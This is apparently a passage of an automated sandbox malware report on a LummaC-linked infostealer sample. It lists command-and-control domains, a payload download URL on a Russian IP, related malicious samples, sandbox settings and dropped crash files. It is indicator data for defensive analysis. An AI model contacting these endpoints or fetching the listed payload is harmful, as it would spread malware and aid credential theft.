robinsharez.shop	false		high
versersleep.shop	false		high
https://skidjazzyric.click/api	true	Avira URL Cloud: malware	unknown
soundtappysk.shop	false		high
crowdwarek.shop	false		high
skidjazzyric.click	true	Avira URL Cloud: malware	unknown
handscreamny.shop	false		high
apporholis.shop	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	Avira URL Cloud: malware	unknown
chipdonkeruz.shop	false		high
femalsabler.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://post-to-me.com/track_prt.php?sub=&cc=DE	fuk7RfLrD3.exe, 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/apie	D1F3.tmp.exe, 00000004.00000003.1470135683.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/apirUQ(e/	D1F3.tmp.exe, 00000004.00000003.1470515175.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE1	fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEd	fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exec	fuk7RfLrD3.exe, 00000002.00000003.1410298623.000000000073B000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.0000000000732000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exe	fuk7RfLrD3.exe, fuk7RfLrD3.exe, 00000002.00000003.1410298623.000000000073B000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, fuk7RfLrD3.exe, 00000002.00000002.3827842898.0000000000732000.00000004.00000020.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/(	D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	fuk7RfLrD3.exe	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE	fuk7RfLrD3.exe, 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microX-z	D1F3.tmp.exe, 00000004.00000002.1712355777.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/0	fuk7RfLrD3.exe, 00000002.00000003.1410298623.000000000073B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	D1F3.tmp.exe, 00000004.00000003.1470716139.0000000002F2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click:443/apil	D1F3.tmp.exe, 00000004.00000003.1470167292.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1470253492.0000000002E27000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exeU	fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/	fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEf-	fuk7RfLrD3.exe, 00000002.00000002.3827842898.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://skidjazzyric.click:443/api	D1F3.tmp.exe, 00000004.00000003.1483638322.0000000002E2D000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000002.1713205915.0000000002E2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	D1F3.tmp.exe, 00000004.00000003.1472031699.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	D1F3.tmp.exe, 00000004.00000003.1444156111.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, D1F3.tmp.exe, 00000004.00000003.1444242869.0000000002E68000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe:C7	fuk7RfLrD3.exe, 00000002.00000003.1410298623.0000000000714000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false
104.21.80.1	skidjazzyric.click	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586501
Start date and time:	2025-01-09 08:32:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fuk7RfLrD3.exe renamed because original name is a hash value
Original Sample Name:	e6f64122e4831f8a05fbeb8c1e4a731a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/7@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 47 Number of non-executed functions: 284
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.40.149.189, 52.168.117.173, 13.107.246.45, 172.202.163.200, 20.190.160.20
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:33:42	API Interceptor	8708013x Sleep call for process: fuk7RfLrD3.exe modified
02:33:46	API Interceptor	5x Sleep call for process: D1F3.tmp.exe modified
02:34:13	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse
	InstallSetup.exe	Get hash	malicious	LummaC	Browse
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
176.113.115.19	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
104.21.80.1	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
skidjazzyric.click	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ab89jay39E.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
post-to-me.com	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
s-part-0017.t-0009.t-msedge.net	Subscription_Renewal_Invoice_2025_FGHDCS.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	GT98765009064.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	Condenast eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://indyhumane.org	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxsYmJ5tlN1JIFNOQtoSEGkLgECYxMchW4UXMllXUALJmesTsjgTR1H-2FvUTVSSAEe4R1GQy-2Bvbd8Zmmy4leDYmh9UNV6oDPX-2BT4wzcyKrfAdXvv6hKSBoru3q77depPs43qOB1DgUqmMdQP-2BNz7H62jYGp-2BH9nmpPKVjXmtKn9w5STVYGL4aqMBL65ruXSYeXZw-3D-3Didct_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419OCcA-2Bhorh4noX10R0htjc0oQD2shNvY2qd7sBvACS4ZxcOvRGqgf-2FzJzWjtjVb7R-2Fc1EPJdReLV-2BtujCvON-2Bc7V1MBDoLDS-2FjF655eEyLK512HQYbp-2FAbQ3P7q3sD01OmQtuWrJdDi7i9EqNYnB7vGsmi9YvC3tf2fi-2F59j5CgE2Yo8KxAbs4pwwxMvCRmFfOK49lsAVAfn3guJ7HTuaWX	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://ar.inderave.ru/jKDI30/#Tapodoll@wc.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	VM_MSG-Gf.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Subscription_Renewal_Invoice_2025_FGHDCS.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://join.grass-io.cc	Get hash	malicious	Unknown	Browse	104.18.18.237
	https://qr.me-qr.com/pt/E9k76ew	Get hash	malicious	Unknown	Browse	188.114.96.3
	watchdog.elf	Get hash	malicious	Xmrig	Browse	1.1.1.1
	https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://rinderynitvye.blogspot.com/	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse	188.114.97.3
CLOUDFLARENETUS	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Subscription_Renewal_Invoice_2025_FGHDCS.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://join.grass-io.cc	Get hash	malicious	Unknown	Browse	104.18.18.237
	https://qr.me-qr.com/pt/E9k76ew	Get hash	malicious	Unknown	Browse	188.114.96.3
	watchdog.elf	Get hash	malicious	Xmrig	Browse	1.1.1.1
	https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://rinderynitvye.blogspot.com/	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse	188.114.97.3
SELECTELRU	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	nYT1CaXH9N.ps1	Get hash	malicious	Amadey	Browse	176.113.115.131
	iy2.dat.exe	Get hash	malicious	XWorm	Browse	176.113.115.170
	z0r0.sh4.elf	Get hash	malicious	Mirai	Browse	82.148.27.5
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	176.113.115_1.170.ps1	Get hash	malicious	XWorm	Browse	176.113.115.170
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	178.132.202.249

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwE	Get hash	malicious	Unknown	Browse	104.21.80.1
	web55.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.80.1
	Rgr8LJz.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	asd.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
37f463bf4616ecd445d4a1937da06e19	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse	172.67.179.207
	2362476847-83854387.07.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse	172.67.179.207
	2o63254452-763487230.06.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwE	Get hash	malicious	Unknown	Browse	172.67.179.207
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.179.207
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.179.207
	D7VRkhOECq.exe	Get hash	malicious	GuLoader	Browse	172.67.179.207
	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D1F3.tmp.exe_c9b51b306e269a2d60d22f619522ab83cfa7b7ac_ff7131e3_48165114-a1e0-4707-a704-69c7940d5838\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0620224298642547
Encrypted:	false
SSDEEP:	192:ykOAc4g0TPxM8djsFmFMQzuiFcEZ24IO80j:NOAc47TPxljDpzuiFcEY4IO8a
MD5:	9C2B49EFD74957C0591A587138593183
SHA1:	63A6C6EBD96B85515B673CDA593F78630A2242CC
SHA-256:	D89763A9DCB66241DA8BF3ECF8E20310907B8DC8EDE8219924B88F0E72761976
SHA-512:	6062CE33AB464E868FEA70310E6637B6B91A9A38D89D74AB457FD9D4C75BA5B697E4A76A58865ED526D23151D11D28D2CC3329C5162D6B8169CDF84BE3F28D07
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.8.1.6.3.3.0.0.7.3.8.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.8.1.6.3.4.6.9.4.8.8.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.1.6.5.1.1.4.-.a.1.e.0.-.4.7.0.7.-.a.7.0.4.-.6.9.c.7.9.4.0.d.5.8.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.8.7.0.2.e.1.-.a.d.0.2.-.4.6.1.1.-.9.0.1.7.-.4.c.6.4.f.4.6.5.5.a.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.1.F.3...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.0.0.-.0.0.0.1.-.0.0.1.4.-.d.e.1.5.-.d.b.c.f.6.8.6.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.2.0.f.a.c.8.0.9.4.1.3.b.4.7.9.4.d.3.f.d.4.6.8.6.c.8.4.3.c.7.a.0.0.0.0.4.2.0.7.!.0.0.0.0.0.9.7.8.4.c.6.e.0.c.0.e.2.b.e.3.6.c.8.3.f.4.1.5.3.5.9.0.8.0.3.9.f.e.1.a.a.3.4.3.!.D.1.F.3...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDEC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 9 07:33:54 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	109774
Entropy (8bit):	2.1924802568406174
Encrypted:	false
SSDEEP:	384:hfY0Dityj27BPA8RO0Ed5MGP6qkw/wAGPJHB3FwdSO5T64yZ0PNYacipbFKTk8DY:hg0Gyj27BPA8cj6qknPRLuSVUpbolg
MD5:	9D607575360B36D39F8062E756D87F77
SHA1:	EAFFF5D9B4BDA450CA08899CE3FD5D2289057186
SHA-256:	92E35670E063172B5DBB2FDEA003EF67CEEEC559985124F9E33ABD6B6A3CE236
SHA-512:	730F2D6EE9720DF72F53C779A9A7FA844CCF1386B55DC529B859C7CA32C4E62AD6E5F09073FC1FD6287CF69C72B04737EA3EB1C6B06E5E7B7753CDF9CC950CB4
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........{.g........................p...............h$......$....N..........`.......8...........T...........HE...g...........$...........&..............................................................................eJ......p'......GenuineIntel............T............{.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD30E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	3.698340464909918
Encrypted:	false
SSDEEP:	192:R6l7wVeJF546Gbx6Y/m6YWgmfgAypDp89bBFsfULm:R6lXJj46Ax6YO65gmfgAJBef1
MD5:	890497D1609503656D14826F9E55E914
SHA1:	FAA88B711A9BF9DB6EFACF480D84B439A73F4B5B
SHA-256:	E8BB71A3BF31487598785DFCC150DBC8A2AA590205251313291324C4228F2D5E
SHA-512:	E0746DF5E23C93E3AB117DCD0421C3D595643A9D30E261E0A7576F8AFAA886050BCDBA33D048183997AD839E570E9A51B1E357A8D1127D84FA6EDD2B5288823C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 